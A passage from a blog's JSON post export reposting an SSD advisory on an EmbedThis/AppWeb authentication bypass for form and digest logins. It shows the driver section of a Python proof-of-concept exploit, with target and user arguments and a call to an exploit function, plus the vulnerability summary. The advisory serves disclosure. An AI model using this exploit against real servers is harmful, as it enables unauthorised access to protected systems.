class=\"crayon-v\">__name__<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">==<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;__main__&#8221;<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c398b916061744-91\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">parser<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">argparse<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">ArgumentParser<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">description<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;Test&amp;Exploit EmbedThis form\/digest authentication bypass (CVE-XXXX-YYYY)&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c398b916061744-92\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">parser<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">add_argument<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;-t&#8217;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;&#8211;target&#8217;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">required<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-t\">True<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">help<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;specify the target url (i.e., http(s):\/\/target-url[:port]\/)&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c398b916061744-93\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">parser<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">add_argument<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;-u&#8217;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;&#8211;user&#8217;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">required<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-t\">True<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">help<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;you need to know a valid user name&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c398b916061744-94\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">parser<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">add_argument<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;-c&#8217;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;&#8211;check&#8217;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">action<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8216;store_true&#8217;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">default<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-t\">False<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">help<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;test for exploitability without running the actual exploit&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c398b916061744-95\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">parser<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">add_argument<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;-f&#8217;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;&#8211;force&#8217;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">action<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8216;store_true&#8217;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">default<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-t\">False<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">help<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;skip exploitability test&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c398b916061744-96\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">args<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">parser<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">parse_args<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c398b916061744-97\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c398b916061744-98\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">url<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">args<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">target<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c398b916061744-99\"><span class=\"crayon-e\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">username<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">args<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-i\">user<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c398b916061744-100\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">t<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;form&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-p\"># default will try form\/post<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c398b916061744-101\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">args<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">check <\/span><span class=\"crayon-st\">or<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">not<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">args<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">force<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c398b916061744-102\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">t<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">test<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">url<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c398b916061744-103\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c398b916061744-104\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">t<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">is<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">None<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c398b916061744-105\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;[!] Target does not appear to be Appweb\/Embedthis HTTP with form\/post auth (force with -f)&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c398b916061744-106\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">else<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c398b916061744-107\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;[+] Potential appweb\/embedthis http, {} method&#8221;<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">format<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">t<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c398b916061744-108\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c398b916061744-109\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">not<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">args<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">check<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c398b916061744-110\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;[!] Exploiting {}, user {}!&#8221;<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">format<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">url<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">username<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c398b916061744-111\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">exploit<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">url<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">username<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">t<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0105 seconds] -->  <\/p>\n<div class=\"printfriendly pf-alignleft\"><a href=\"#\" rel=\"nofollow\" onclick=\"window.print(); return false;\" class=\"noslimstat\" title=\"Printer Friendly, PDF &#038; Email\"><img decoding=\"async\" style=\"border:none;-webkit-box-shadow:none; box-shadow:none;\" src=\"https:\/\/cdn.printfriendly.com\/buttons\/printfriendly-button.png\" alt=\"Print Friendly, PDF &#038; Email\" \/><\/a><\/div>\n<\/div><\/div>\n<p><a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3676\" target=\"bwo\" >https:\/\/blogs.securiteam.com\/index.php\/feed<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p><img decoding=\"async\" src=\"https:\/\/cdn.printfriendly.com\/buttons\/printfriendly-button.png\"\/><\/p>\n<p><strong>Credit to Author: SSD \/ Noam Rathaus| Date: Wed, 14 Mar 2018 19:01:53 +0000<\/strong><\/p>\n<p>Vulnerability Summary A critical vulnerability in the EmbedThis HTTP library, and Appweb versions 5.5.x, 6.x, and 7.x including the latest version present in the git repository. In detail, due to a logic flaw, with a forged HTTP request it is possible to bypass the authentication for form and digest login types. Confirmed Vulnerable Appweb version &#8230; <a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3676\" class=\"more-link\">Continue reading <span class=\"screen-reader-text\">SSD Advisory &#8211; AppWeb Authentication Bypass (Digest, Basic and Forms)<\/span><\/a><\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10643,10754],"tags":[10757,12136],"class_list":["post-11742","post","type-post","status-publish","format-standard","hentry","category-independent","category-securiteam","tag-securiteam-secure-disclosure","tag-unauthenticated-action"],"_links":{"self":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/11742","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=11742"}],"version-history":[{"count":0,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/11742\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=11742"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=11742"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=11742"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}